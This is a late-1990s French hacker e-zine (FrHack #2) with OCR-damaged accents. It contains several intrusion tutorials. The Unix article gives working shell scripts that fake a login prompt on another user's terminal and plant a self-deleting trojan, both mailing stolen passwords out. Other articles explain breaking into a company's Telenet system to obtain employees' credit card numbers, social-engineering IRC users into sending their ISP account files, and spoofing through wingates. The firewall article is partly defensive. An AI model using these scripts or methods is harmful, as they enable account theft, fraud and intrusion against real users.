Copy Link
Add to Bookmark
Report

FrHack 2

eZine's profile picture
Published in 
FrHack
 · 4 years ago

  

FRHACK # 2

_________ ________
(_________)) (________))
(___________)) (_____)) (_))
(_____))____ (_____))__(_)) ___ ___
(___________)) (__________)) (___) (___)
(_____)) (_____)) (_)) (___)___ _______ ______ (___)___
(_____)) (_____)) (_)) (_______)(_______)( ____)(_______)
(_____)) (_____)) (_)) (___) (_)(___)(__)( (____ (___()__)
(_____)) (_____)) (_)) (___) (_)(_______)(______)(___) (_)
_ _____ ___ ___ _____ ______ ____ __ (_) ____
( __) ( _)(_ ) ( _ ) ( ___) ( _ ) ( ) / _ | ) (__ __ )( \/ ) ) ) (_) ( ) ( __ )( (_) )( / // |
( __)(__)( ) ( ) ( (---) ) ( ) ) _) ( ) (_)( ) /_// /
) (__ )( )( )( )( ) (__( ) )( ( ))( / /__ (_____) (__) (__) (__) (__) (_______) (__) (___) /______\

Irc: Undernet #hack.fr Web: www.frhack.org

-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Disclamer


L'‚quipe de FrHack offre … votre disponibilit‚ un Emag. Ce Emag n'a pour but que d'inform‚ donc nous ne sommes nullement responsables des pertes de donn‚es informatiques que ces informations pouraient occasionnellement caus‚es, bien ou mal utilis‚es.

Vous introduire sans autorisation dans un autre systeme informatique, changer de quelques manieres que ce soit les fichier que le systeme contient, est totalement ill‚gal, que vous le fassiez consciament ou non. Biens–r les textes comprient dans ce Emag peuvent vous montrer … rentrer sur un ordinateur, mais vous devez vous servir de ces textes que pour vous amusez, et combler votre soif de savoir jusqu'au prochain Emag.

galement, aucun des r‚dacteurs de FrHack ne peut ˆtre blƒmer des dommages caus‚s, accidentelement ou non, … un ordinateur grƒce … son article.

De plus, FrHack s'engage … vous fournir le moins possible d'informations erron‚es. Si vous trouvez une informations erron‚es dans les textes qui suivent ce disclamer, dites-vous que l'erreure est humaine, et veuillez nous faire part de cette information fauss‚e.

Le contenu de ce Emag n'est pas decern‚ aux personnes suivantes. Personne travaillant pour le gouvernement, policier, personne travaillant pour un partie politique ou une agence gouvernementale .

En continuant … lire ce Emag, vous agr‚ez entierement … tout ce qui a ‚t‚ ‚nonc‚ ci-dessus et
vous vous engagez … ne pas utiliser les informations contenues dans ce Emag de quelque maniere que ce soit ou qui pourrait entrer en conflit avec la loi.

L'‚quipe de FrHack vous souhaite une bonne lecture, et espere que vous apr‚cierez notre Emag.



L'‚quipe de FrHack


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Sommaire


Article Auteur
Underground kthulu
Telenet Snowcrach
Acompte FT gratuit Dr_JI
Spoofing Walla
Hacking de compte Unix Snowcrach
Firewall et Proxy Snowcrach
Peroxyde d'acetone _Franck
Trojan Bismuth
Port Linux Khanabyss
Server SMTP Langly
Slogan FrHack
WeaponX boxe Snowcrach
Password Linux Oktober
Resetter des Password NuClEaR
Configuration de souris sous X Oktober
Conclusion Snowcrach


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Underground

Ici vous ne trouverez pas d'informations techniques mais juste un petit d‚lire sur la fa‡on dont je con‡ois la scŠne fran‡aise. Pour commencer, je veux insister sur les difficult‚es que j'ai eu au d‚but, je tenterais d'analyser dans une seconde partie pourquoi la scŠne fran‡aise est aussi peu d‚vellop‚e et pour terminer je tenterais de donner quelques bons conseils et liens pour
ceux qui d‚butent. Je ne suis pas un dieu en informatique mais en livrant ma propre exp‚rience je pense que ‡a aidera les newbies ! Pour toutes remarques, d‚saccord ou au contraire encouragement, n'h‚sitez pas … m'envoyer un mail, je tacherais d'y r‚pondre soit en priv‚
soit par un article ici mˆme. Vous pouvez aussi me retrouver sur irc UnderNet … #hack.fr.

Le difficile passage de la larve … l'‚tat de jeune papillon ! En fait tout commence avec la d‚couverte d'irc ! On se fait des cybers amis et rapidement on apprend les mots de LaMeR,
newbie ou autres choses d‚sagr‚ables et qui blessent notre amour propre et on se dit : "et pourquoi je ne sortirais pas de mon cocon moi aussi ?" A partir de l…, on d‚couvre l'underground, j'ai de suite ‚tait passionn‚ par ce milieux de gens tr‚s secrets et
avares de conseils. C'est donc tout naturellement que j'ai voulu devenir moi aussi un "HaCkEr", mais le chemin qui mˆne de jeune internaute … "hacker" est long et sem‚ d'emb–ches !. j'ai commenc‚ par me rendre sur des channels de hack, mais j'ai rapidement ‚t‚ d‚‡u par le comportement des personnes pr‚sentes sur ce genre de channel. En effet lorsque je posais des
questions, il n'y en avait pas un seul pour me r‚pondre o— alors je me faisais simplement kick‚ et bannir du channel (je ne citerais pas les noms). j'ai gal‚r‚ comme ‡a de d‚ceptions en d‚ceptions jusqu'… ce qu'un jour, on m'a conseill‚ de lire les noroutes. Une petite recherche sur "hack" … aboutie au t‚l‚chargement de ces e-mags. Et l…, h“ joie, h“ bonheur, j'ai enfin
d‚couvert des r‚ponses … mes questions ! Tr‚s vite, ces e-mags devinrent mais livres de chevets. C'est fou tout ce qu'on peux apprendre l… dedans . Les profs oublient un peu trop de choses quand ils font leur cours sur tcp/ip ou autres protocoles. Dans ce genre de magazines, j'y ai aussi appris pourquoi les hackers ‚taient aussi peu bavard. C'est en gros, les difficult‚es majeures que j'ai eu au d‚but (comme beaucoup je suppose). Bien s–r, s'ajoute les difficult‚es de compr‚hension. NFS, TCP/IP, showmount -e, root, dnsquery, nslookup ... sont des mots bien barbares au d‚buts, mais vous verrez, … force de pratique et de
travail on finis par saisir !

Par ce petit paragraphe, je lance un cri de d‚tresse au hackers "confirm‚s" : les gars il serait sympa de prendre un newbie sous notre aile et l'aider … se faire un place parmis nous au lieu de nous lamenter sans arrˆt sur le develloppement de la scŠne fran‡aise. Pour les newbies, comprenez juste qu'ils vous faut insister pour tirez des infos au vieux loups !

Pourquoi tant de haine ?

Je me demandais pourquoi la scŠne fran‡aise ‚tait aussi peu d‚vellop‚e et aussi peu active. J'ai deux r‚ponses … proposer : * la premiŠre * Je pense que comme vu dans le paragraphe du dessus, cela vient du fait qu'on a pas envie, ou pas le temps de r‚pondre aux questions des jeunes qui d‚butent, notre attitude doit en d‚courager plus d'un. il est clair qu'on ne peux pas
d‚voiller notre activit‚ et nos connaissances au premier venu sur un channel irc. Il vaut savoir que les V trainent eux aussi sur les channels de hack dans l'espoir que nous nous d‚couvrions, il est donc l‚gitime de ne pas avoir envie de r‚pondre quand LaMer nous demande : "Tu as d‚j… hack‚ un serveur politique ?" Il est clair qu'on ne peux pas savoir si c'est un "jeune" qui veux se
lancer ou si c'est un V qui cherche le mec qui s'est fait le serveur du PCF (mouahahahahaha) ! Le problŠme et donc de savoir si on peux faire confiance ou non … ce gus ! moi je pense que du moment qu'on ne donne aucune informations personnelles, on peux r‚pondre … LaMer. Bon ce qui est sao–lant , c'est aussi le gars qui croit que le hack consiste … envoyer une s‚rie de nuke
pour prouver sa sup‚riorit‚, je trouve qu'il n'y a rien de plus aga‡ant que de voir s'afficher sur mon ‚cran : "Nuke detect from : XXX.XXX.XXX.XX" le pire c'est que le gus est sous loOzedaube et il croit planter mon shell unix (bon courage !) et que quand on s'interesse de plus pr‚s … sa machine, il a l'option : "ressources partg‚es" qui est valid‚e ! ;) mais bon il faut aussi les
comprendre c'est pas ‚vident de se faire remarquer pour que quelqu'un daigne nous r‚pondre.
Il est tr‚s fr‚quent de lire dans la presse des articles sur des pirates informatiques qui se sont fait arrˆter ! On a pas trop envie de se faire "buster" donc on parle au moins de gens possible et en tout cas on parle jamais de nos r‚sussites ou ‚checs. Pourtant quelle protection on se ferait si on disait : ok les gars, je suis rentrer sur www.victime.com par telles m‚thodes allez y.
Imaginez un peu la tronche du rewt qui le lendemain matin verrait 50 ou 60 intrusions sur son systŠme ? Et en plus, aucune intrusion venant du mˆme endroit ! je peux vous garantir que le gars il cherchera mˆme pas … savoir si c'est un seul hacker qui a utilis‚ 60 rebonds (que celui qui a 60 rebonds me fasse signe) ou si c'est 60 hackers diff‚rents ! En plus l'union fait la force dans tous les mecs qui rentrent et qui essaye d'effacer leur traces, y en a un de plus malin que les autres pour ce genre de boulot alors si il pouvait penser aux copains qui sont rentr‚s avant ‡a aiderait aussi. Bien sur il y a un problŠme d'‚thique : je suis sur le serveur qu'est ce que je fais ? ceux qui r‚pondent :"je le crushe" peuvent partir de suite et inutile de revenir. C'est … cause d'attaques trop bourrines ou qui entrent trop dans la vie priv‚e des gens que les hackers sont diabolis‚s et d‚sign‚s comme les ennemis publics num‚ro 1 du 21ø siŠcle.
Grosso merdum je dirais que la scŠne fran‡aise n'est pas bien devellop‚e a cause des encu*** qui font du crushing et par la mˆme transorment les gentils hackers (mouahahahaha) en vilain pirates. MESSIEURS DE LA DST : NOUS NE SOMMES PAS DES MEURTRIERS ! NOUS SOMMES JUSTE DES PASSIONNES DE SECURITE RESEAU !!!!!!!

* La deuxiŠme * Heuuuuuuu ... ben heu ..... en fait ... je sais plus .... ! envoyer moi votre avis, je le mettrais l… !


Deux trois conseils pour les newbies

Ben en fait : quand vous debarquez sur des channels de hack sur irc, arretez de faire les trisomiques et surtout ne croyez pas que le hack c'est facile.
Un moteur de recherche sympa (mais tout en anglais) : Altalavista … http://194.1.128.27.
Un regroupement de petits progs pour unix aussi bien que pour loOzeDaube : http://www.rootshell.com Un site ou on trouve de tout mais en anglais : http://www.elitehackers.com
Sur irc : UnderNet : #hack.fr


Merci de m'avoir lu bon courage pour les nouveaux sur la scŠne et bonne continuation aux vieux loups ! Que vous soyez newbies ou vieux loups maillez moi, j'ai besoin de vos conseils !

The FrHack Crew
Kthulu


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Telenet


Pr‚face
Dans ce texte, je vais tent‚ de vous expliquer le principe de Telenet.
Souvent m‚langer avec Telnet, ce petit programme devrait ˆtre connu
de tous les pirateurs informatiques.

Telenet

Premierement vous devez trouver un port telenet.

1-800-compagnie-prete-a-se-faire-hacker
1-800-hackermoi

Faite lui une session telenet avec le mode 'No Echo'.
Ca devrait ressembler … ‡a.

Telenet

313 19A

TERMINAL=

Quand vous aller voir le 'prompt' TERMINAL=, taper D1 ou A1.
Le systeme devrait repondre:

@

Vous devrez maintenant taper soit 'C 313 160' ou 'C 312 160'. Cela va imprimer
des caractŠres double depuis que vous vous etes mit en mode 'No Echo'.
Votre ‚cran devrait afficher:

Telenet

313 19A

TERMINAL=AA22

@CC 331133 116600

313 160 CONNECTED

PASSWORD
XXXXXXXXXXXXX
IIIIIIIIIIIIIIIIIIIIIIIIIIIII
HHHHHHHHHHHHH

Passwords
Meme si le 'Mask' de password est de 12 caractŠres, ceux-ci seront seulement
de 9 caractŠres. Le format est le suivant.

N,LNNNNNN

Le chiffre N signifie num‚rique et le signe L signifie Alphab‚tique.
La plupart des passwords sont configur‚s comme ceci:

9,XNNNNNN

Ceux des magasins seront:

8,XNNNNNN

Je doit ˆtre clair, vos chance de trouver le password sont de une sur un milion.
Pour hacker le password, je vous montrerai plus tard.

Maintenant, si votre password est bon ou non, vous verez ceci:

Port = $X25G00 #VC03 ON AT 22:40 CT, 15 DEC 1998
UserID: ?


UserID
Le format du UserID est facilement configurer. La plupart d'entre eux seront:

MS<4 DIGIT STORE NUMBER><2 DIGIT USER NUMBER>

Le User Number commence … 01 et vas jusqu'… 99, meme si normalement 99 est
rarement choisi.Le Store number User ID devrait etre 'MM' au lieu de 'MS' normalement.
Ca devrait etre:

MM<4DIGIT STORE NUMBER>01

Pour avoir le num‚ro du magasin(Store number) vous n'avez qu'… apeler au magasin.
Celui de Cogeco … Trois-RiviŠres est 7025. Le Manager ID devrait etre:

MM702501

Un autre ID pourrait etre:

MS702501

Normalement, lorsque l'entrepreneur du systeme as fini de se loguer, le systeme envoie les fichiers logs par imprimante, ce dernier les jetent dans les poubelles de l'entreprise. Vous n'aurez qu'… aller les chercher et vous aurez les password cl‚ pour hacker le systeme.

Programme
Quand tu as le bon User ID et le bon Pasword, et que tu les as rentrer, ca devrait resembler a ceci:

Cogeco Cable LAST LOG-ON AT 22:54 CT, 14 DEC 1998

Programme

Voici quelques programmes avalables:

PNL, TIM, OPR, CHG PAY, PAYROLL, CHG CREW, CASH, DLEGER, BYE, MEET, ACV, BJOB, MAL, RELEASE

CREW REQUEST?

TERM=TERMINATE (FIRE A CREW MEMBER)

Entrer '4' pour un term code

NEW= Ajouter un nouveau membre pour la job title code 660

Le reste du systeme va etre dif‚rent pour chaque, vous devrez vous debrouiller seul. Le programme 'MEET' devrait etre trŠs utile en vous donnant tous les num‚ros de carte de cr‚dits des personnes qui travaillent pour l'entreprise.

The FrHack Crew
Snowcrash


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Acompte FT gratuit

Qu'est-ce que ISE?
C'est l'Internet Social engeneering.
L'art du social engeneering apliqu‚ … internet en mot clair.
En fait aujourd'hui je vais vous faire part de quelque chose ma fois fort facile
et malgr‚ extremement utile .



Mini-Howto sur comment je fais pour avoir une connexion Infonie :

Plusieurs solutions :
1) Tu payes, c'est pas trop dur (mais cher)

2) Tu demandes … un ami de t'h‚berg‚.

3) Tu trouves un moyen de te connect‚ sur le compte de quelqu'un d'autre . C'est cela
qui nous int‚rresse.


Pour se connecte … Infonie la seule chose dont on a besoin c'est d'un num‚ro
d'abonnement .

Comment trouve des num‚ros d'abonnements

Le num‚ro d'abonement est contenu dans le fichier infonie.ini. Ce dernier ce trouve
dans le r‚pertoire C:\Windows . On peut toujours demander … quelqu'un de nous
l'envoyer, mais la subtilit‚, ca compte. C'est la que le social engeneering commence.

Primo : Savoir ou trouver la victime
Je pense que l'IRC est vraiment une cible de choix donc on se connecte sur IRC
et on se rends (ss un faux pseudo qui fait vraiment newbie ) dans un chan qui
regroupe des bouffons de chez infonie (‚viter les vrai channel de hack car sa
marchera pas ...)

Secondo : Savoir qui choisr comme victime
Vous etes sur un chan comme #warez-france. Chercher des mecs d'infonie qui ne
sont pas op ensuite faite leurs un query et commencer la discution avec ce monsieur.

Tertio : L'art de l'embrouille en quelques lecons
1ere lecon : Qand tu ecris au mec ecrit toujours tout,pas d'abreviations ni de
smileys, ‚vite les fautes d'ortographes.
1ere bis : Repond lentement pour faire voir que tu n'es pas habitu‚ … taper
sur un clavier .
2eme lecon : tale ton ignorance, fait lui sentir qu'il est un dieu du net par
rapport … toi.
3eme lecon : Apres avoir bien noyer le poisson, tu lui demande son infonie.ini
sous une excuse bidon (moi perso j'aime bien les embrouller avec un truc du style
"mon internet explorer refuse de se lancer les mecs du services clients m'ont
dit que sa venait de mon infonie.ini qui est merdique tu peux m'envoyer le tien ?"

4eme lecon : Qand tu l'as remercie le ,salut le et casse toi mais surout NE LUI
DIT PAS QUE TU L'AS NIKE (le moins ils en savent, le mieux c'est. )

Reste plus qu'… te connect‚ avec son num‚ro d'abonnement. (c'est le truc … 15 chiffres
quii commence par 199 dans le fichier).

The FrHack Crew
Dr_JI


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Spoofing

Salut Chers Amis

Je me presente, je m'appelle WaLLa et je vous explique
comment faire pour spoofer votre adresse et
ip , cela est trŠs facile quand vous avez deja
un Ip qui a le port 23 d'ouvert .
J'explique si vous n'avez pas de Ip avec le port 23
d'ouvert ... par exemple si vous voulez que votre
adresse finisse par videotron.net cela est tres
simple vous prenez l'ip de quelqu'un qui a cette
adresse et vous la scanner a l'aider de scan
wingate (tres facile a trouver sur le web faites
une recherche sur yahoo vous allez vite trouver !)
Bon voila je crois avoir ‚t‚ assez precis si vous
avez des questions tout … la fin de ce texte il y
a mes coordonn‚s !! contactez moi si vous vous en
sortez pas !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
==================================================
==================================================
/server <l'ip_du_poulet> 23
/raw <Server> <Port>
/raw nick <Ton_Nick>
/raw user <Ton_id> * * :<Ton_vrai_nom>
==================================================
==================================================
/server ip 23
/raw newbrunswick.nj.us.undernet.org 6664
/raw nick WaLLa
/raw user HONDA * * :Z_RuLeZ
==================================================
==================================================
Les Servers:
==================================================
==================================================
/raw StLouis.MO.US.UnderNet.org 6667
/raw montreal.qu.ca.undernet.org 6667
/raw lulea.se.eu.undernet.org 6667,7000
/raw diemen.nl.eu.undernet.org 6667,6668,6669
/raw caen.fr.eu.undernet.org 6667,6668
/raw amsterdam.nl.eu.undernet.org 6667,6668
/raw panoramix.umh.ac.be 6667
/raw irc.belnet.be 6667

The FrHack Crew
Walla
WaLLaRoo99@Hotmail.com


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Hacking de compte Unix

Pr‚face
Dans ce texte, je vais tenter de vous expliquer comment hacker un acompte Unix.
Cela ne vous permeteras pas de hacker le 'root' alors ne vous faites pas d'id‚e.

Le Fake Login
Cette maniere est trŠs simple, mais ne marche que neuf fois sur 10. Cela depends
toujours du niveau de comp‚tence des utilisateurs et de l'administrateur de la Box.
Si vous avez affaire … de vrais d‚butants , vos chance de r‚ussite sont de deux
cents pour cent.

Le principe est simple. Sous Unix chaque connexion utilise un
terminal qui est en fait un fichier dans le rep '/dev'.
Chaque telnet lanc‚ va utiliser un de ces fichier ttyXX
(XX= numero du terminal).

Faites un 'who' ce qui va lister les utilisateurs connect‚s avec leur
num‚ro de terminal.

% who

[user] [tty] [tmps de connexion]
----- ----- ----------
user1 tty00 12:22
user2 tty01 00:44
user3 tty12 05:14
user4 tty08 01:00

Voici le resultat d'une commande 'who'. On voit bien que chaque user
utilise un terminal sp‚cifique (user1 utilise le tty00) hors, chacun de
ces terminaux est en fait un fichier /dev/ttyXX, ainsi vous pouvez
‚crire sur ces fichiers ce qui s'affichera directement sur l'‚cran du
user qui utilise ce terminal.

Voici donc ce que nous allons faire.
On va executer un script shell qui simule un Reboot du serveur
et demandera … l'utilisateur son Login et Password … nouveau.
Voici le script … r‚alis‚.

#~/fakelogin.sh
# Ca doit ressembler au reboot du Server

echo "Broadcast message from root...."
echo " "
echo "Digital UNIX (machine.server.fr) (tty00)"
echo " "
echo "login: \c"
read lgin
echo off
echo "Password: \c"
read pw
echo " "
echo on
# (Votre mail)
echo "Login: $lgin - Pword: $pw" | mail (votre mail)

# fin du script

Maintenant, copier ce script dans un fichier fakelogin.sh (placer dans vote
homedir). Il vous suffira de faire en sorte que ce script
ressemble … votre Login et de mettre votre email puis de
tapez:

% cat fakelogin.sh >/dev/ttyXX
(remplacer ttyXX par le terminal … hacker).

Ensuite vous aller recevoir un email vous indiquant le login et le mot de passe
de l'utilisateur.

Le fichier Password
videment le plus simple pour hacker une machine Unix est de lire
directement tous les mots de passes la o— ils sont ‚crit (c'est … dire
dans /etc/passwd) mais la plus part du temp vous imaginez bien
que l'admin ne laisse pas ce fichier en lecture. Ou il est
encode . Donc vous pouvez toujours essayer:

% cat /etc/passwd | more

Ca m'etonnerai que ca marche ou alors c'est que vous avez de la
chance . Attention aux fausses joies car bien souvent le fichier passwd est
encode. C'est … dire que le fichier peut ˆtre lu mais les mots de
pass sont remplaces par des '*' et les vrais pass sont dans un autre
fichier qui lui n'est lisible que par le root.

Permission sur les HomeDir
Pourquoi ne pas profiter de l'oubli d'un utilisateur pour lui
hacker son compte. Aller dans le repetoir des /usr et tapez:

% ls -l | more

Ce qui listera tous les comptes avec les permissions:

Rappel:
les permissions sur unix se font de la maniere suivante:
r = read
w = write
x = execute

-rwxr-xr-x signifie: -rwx (owner) r-x (group) r-x (all).
Soit que ce fichier est en lecture/ecritur/exec pour le propri‚taire
et en lectur/exec pour les autres.

Si il y a un 'd' devant cela signifie qu'il s'agit d'un repetoire.

bon voici un exemple de resultat affiche apres un 'ls -l' dans /usr

[permissions][user][date] [size]
------------ ---- ---- -----
drwxr-xr-x bob 1998 21
drwxr-xr-x bill 1998 11
drwxr-xr-x Zoe 1997 05
drwxrwxrwx fila667 1998 32
drwxr-xr-x Monic 1997 29

On voit que le homedir de fila667 est en drwxrwxrwx c'est … dire que
vous pouvez non seulement le lire mais aussi y ‚cire. Si vous ˆtes
chanceux, L'utilisateur Fila667 auras laiss‚ son repertoire en mode
‚criture.

Vous pouvez donc installer tranquillement un petit script dans le repertoire
de fila667 de maniere … ce que celui ci l'‚xecute et vous donne son mot
de passe. Sachez faire en sorte que fila667 ‚xecute ce script et aussi
qu'il ne se rende pas compte qu'il est en train de lancer de lui meme
un cheval de troie. Le mieux serait de mettre un proc‚der d'auto-destruction
pour ne laisser aucune trace.

Voici un exemple de script … placer dans le repertoire de Fila667.

#!/usr/homedir/SECURITY
echo " "
echo " SECURITY DAEMON "
echo " "
echo " The security Daemon has locate that your "
echo " password is unsecure please change it now!"
echo " "
echo "old Password: \c"
read pw
echo " "
echo "New Password: \c"
echo " "
echo "Thank you "
echo on
# (votre email)
echo "Pword: $pw" | mail (votre email)
# efface le script
rm -f SECURITY

# fin du script

Une fois que vous avez configurer ce script copier le chez fila667
et rendez le executable:

% cp SECURITY /usr/fila667
% chmod u+x /usr/fila667/SECURITY

Et voila le pauvre fila667 une fois de plus en croyant bien faire c'est
fait voler son mot de passe.

The FrHack Crew
Snowcrach


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Firewall et Proxy

Pr‚face
Dans ce texte, je vais tenter de vous expliquer le fonctionnement des firewalls.
Ils servent … deux choses. Prot‚ger le reseau interne contre les tentatives d'intruision
venant de l'ext‚rieur. Le principe du Firewall est trŠs simple.A l'origine un firewall
est un systŠme comportant deux interfaces r‚seau. Pour la suite on prendra le premier cas , celui ou l'on souhaite prot‚ger tout le r‚seau local. On a en fait une interface interne reli‚e au r‚seau local et une interface externe reli‚e … Internet. L'ordinateur firewall peut atteindre … la fois le r‚seau prot‚g‚ et Internet. Le r‚seau protŠge ne peut atteindre Internet et Internet ne peut toucher le r‚seau protŠge.

Firewall et Routeur IP
Le routeur prend en charge les paquets jusqu'… la couche IP. Le routeur transmet chaque paquet en fonction de l'adresse de destination du paquet et de la route vers la destination pr‚cis‚e dans la table de routage. Par contre le firewall ne transmet pas les paquets. Le pare-feu accepte les paquets et les prend en charge jusqu'… la couche application.

Types de Firewalls

Filtres de paquets

Un firewall de ce type inspecte tous les paquets qu'il recoie et regarde s'ils correspondent aux rŠgles pr‚alablement ‚tablis. S'il respecte les rŠgles il est accept‚, sinon il est rejet‚. Les critŠres des rŠgles peuvent ˆtre par exemple l'adresse IP, les ports sources et destination contenu dans les paquets.

Les Proxy

Lorsqu'un firewall de type proxy est utilis‚ sur un r‚seau, il n'y a aucune connexion directe entre les systŠmes du r‚seau local et le r‚seau Internet. Les machines internes se connectent en fait au firewall pour lui demander un service. AprŠs le FW se charge de relayer la requˆte au serveur Internet puis de renvoyer la r‚ponse au client interne.

Filtres de paquets

La technologie de filtre de paquets est incluse dans le noyau de Linux . Le filtre doit agir dans la pile IP du systŠme . Pour utiliser cette technique vous allez devoir une fois de plus recompiler le noyau et r‚pondre YES aux questions suivantes:

IP: forwarding/gatewaying (CONFIG_IP_FORWARD) YES
IP: firewalling (CONFIG_IP_FIREWALL) YES
IP: firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE) YES

Le noyau compil‚ , install‚ , red‚marr‚ vous allez ˆtre en mesure de configur‚ le FW.
Pour cela on va utilis‚ ipfadm .
La syntaxe g‚n‚rale est:

ipfwadm-A commande paramŠtres [options]
ipfwadm -I commande paramŠtres [options]
ipfwadm -O commande paramŠtres [options]
ipfwadm -F commande paramŠtres [options]
ipfwadm -M [-l ou -s] [options]

Comme vous venez de le voir il y a cinq cat‚gories:
-A configuration de l'accounting (compatibit‚ des paquets atteignant le systŠme) .
-I rŠgles … appliquer aux paquets TCP/IP en entr‚e .
-O rŠgles … appliquer aux paquets TCP/IP en sortie .
-F rŠgles … appliquer aux paquets TCP/IP … router d'une interface … une autre .
-M administration de l'IP Masquerading.

Perso je pourrais vous parler que des categories I , O , F , M.
ipfwadm possŠde de trŠs nombreuses options que je vais pas d‚crire ici par ce j'ai pas envie. Lisez la doc Linux .

Avant de cr‚er toute rŠgles de filtre IP , vas falloir d‚finir des rŠgles de s‚curit‚ .
Par exemple pour ma machine on va dire:
Toute connexion du r‚seau internet vers une machine interne est interdite .
De ext‚rieur , on doit avoir accŠs au serveur de messagerie et au service DNS du firewall .

On va dire qu'on a un r‚seau interne de type 193.1.1.0/24 et qu'on est reli‚ … un sous r‚seau de type 193.1.2.0/24 (entre le FW et le routeur) . Le FW ayant pour adresse 193.1.1.254 en interne (eth0) et 193.1.2.1 en externe (eth1) .

Je vais maintenant dire quelques uns des filtres que j'applique

-ipfwadm -O -p accept
La rŠgle par d‚faut des paquets en sortie est accept (-p repr‚sente l'action par d‚faut)
- ipfwadm -I -p deny
La rŠgle par d‚faut des paquets en entr‚e est deny .
-ipfwadm -F -p deny
La rŠgle par d‚faut des paquets … router en entr‚e est deny .
-ipfwadm -F -a accept -S 193.1.1.0/24 -D0/0 -P tcp
Autorisation pour router tous les paquets TCP provenant de l'ext‚rieur .
-ipfwadm -I -a deny -S 193.1.1.0/24 -D0/0 -W eth1
Cette commande sert … lutter contre le SPOOFING (changer son adresse IP) en effet cette rŠgle dit que tous les paquets qui rentrent dans le sous r‚seau s‚curis‚ et qui ont une adresse source correspondant … une adresse du sous r‚seau (ce qui n'est pas logique) doivent ˆtre rejet‚!
-ipfawadm -I -a accept -P udp -S0/0 -D 193.2.1.1 53
-ipfawadm -I -a accept -P tcp -S0/0 -D 193.2.1.1 53
Ces mesures disent que les accŠs au serveur DNS (port 53) sont accessible de n'importe o— .
-ipfawadm -I -a accept -P udp -S0/0 -D 193.2.1.1 25
AccŠs au serveur SMTP du firewall de n'importe o— .

Malheureusement on retrouve l… le plus grand inconvenient des FW . En effet dans l'‚tat actuelle systŠme on ne pourra pas faire fonctionner un client FTP du r‚seau interne avec un serveur situ‚ … l'ext‚rieur .
Le protocole FTP pr‚voit l'‚tablissement d'une connexion du serveur FTP vers le client (du port 20 -> port > 1024)

Mais il y a des solutions .
- Utiliser le client FTP en mode passif (A ce moment le client ‚tablit une connexion vers le serveur ftp)
- Utiliser un proxy(voir section suivante) install‚ sur le FW qui relaiera les requˆtes de l'int‚rieur vers ext‚rieur .
- Utiliser l'IP masquerading .
- Ou alors rajouter cette rŠgle
ipfwadm -F -a accept -P tcp -S0/0 20 -D 193.1.1.0/24 1024-65535

Remarque int‚ressante: Si vous tombez sur un systŠme avec une rŠgle de ce type , vous pouvez en profitez , en effet cette rŠgle expose les services du r‚seau interne qui ‚coutent sur un port >1024 . A partir de la vous avez plus qu'a fait partir un paquet du port 20 de votre machine vers un service . Beaucoup de services tournent sur ce port .
Par exemple pour sur les ports 6000vous avez les services X-Windows . S'ils n'ont pas ete protege correctement vous pouvez voir ce que fait l'utilisateur. Vous pouvez memes voir les toubhes frappees , les programmes lancees. Si vous faites telnet dessus vous aurez je pense l'effet d'un denial of service; l'ecran va se geler , le sys va ralentir ... Mais il y a plus mieux.
Si vous vous y connaissez un peu en programmation utilisez la fonction XOpenDisplay() , si la fonction retourne NULL alors c'est securise sinon ...

char *hostname;

if (XOpenDisplay(hostname) == NULL) {
printf("Loupe : %s\n", hostname);
} else {
printf("Ca marche : %s\n", hostname);
}



Il y a a autre chose auquel il faut penser . Normalement la route qu'emprunte un paquet de sa source … sa destination est determinee par les routeurs qui se trouvent entre eux. En fonction de l'adresse de destination et de leur table les routeurs se chargent de dirigier les paquets . Mais dans une trame TCP/IP, il y a une option qui porte le nom de ®source routing¯ qui est peu utilisee. En fait on l'utilise dans le debuggage des reseaux pour trouver les problŠmes. Le truc c'est que si vous envoyez un paquet en faisant croire qu'il vient de l'interieur, normalement les routeurs ne devrait pas l'ammener au FW mais le probleme la c'est qu'ils le font avec cette option. En plus c'est pas dificile a faire. Mais normalement il y a des options pour desactiver le ®source routing¯ .

Masquerading

C'est une technique de plus en plus utilis‚e . Elle consiste … masquer totalement l'adressage IP du r‚seau interne ( On peut donc utiliser des adresses IP priv‚es ) . Ainsi chaque paquet qui traverse le firewall est modifi‚ pour faire croire qu'il n'y a qu'un seul systŠme connect‚ . Tout le r‚seau interne partage ainsi l'adresse IP (externe) du FW .

Installation:
Bon beh va falloir recompiler le noyau et r‚pondre YES aux questions:

IP: forwarding/gatewaying (CONFIG_IP_FORWARD)
IP: firewalling (CONFIG_IP_FIREWALL)
IP: firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE)
IP: masquerading (CONFIG_IP_MASQUERADE)
IP: ICMP masquerading (CONFIG_IP_MASQUERADE_ICMP)


Maintenant vous allez ˆtre en mesure d'utiliser une autre des 5 options d'ipfwadm: l'option -M .
Pour cela utiliser l'option -l qui liste les connexions qui utilisent l'IP masquerading et -s qui fixe le timeout .

Pour autoriser le masquerading il faudra les rŠgles suivantes
- ipfwadm -F -p deny
- ipfwadm -F -a masquerade -S 192.10.10.0/24 -D0/0

Les Proxy

D'aprŠs ce que j'ai lu et ce qu'on m'a dit la meilleure solution pour utiliser une machine Linux en proxy consiste … utiliser l'ensemble d'outils qu'offre TIS .
Ils fournissent un package connu sous le nom de FW toolkit . Vous pouvez le telecharger sur le site Web de TIS
http://www.tis.com/docs/products/fwtk/index.html

Installation

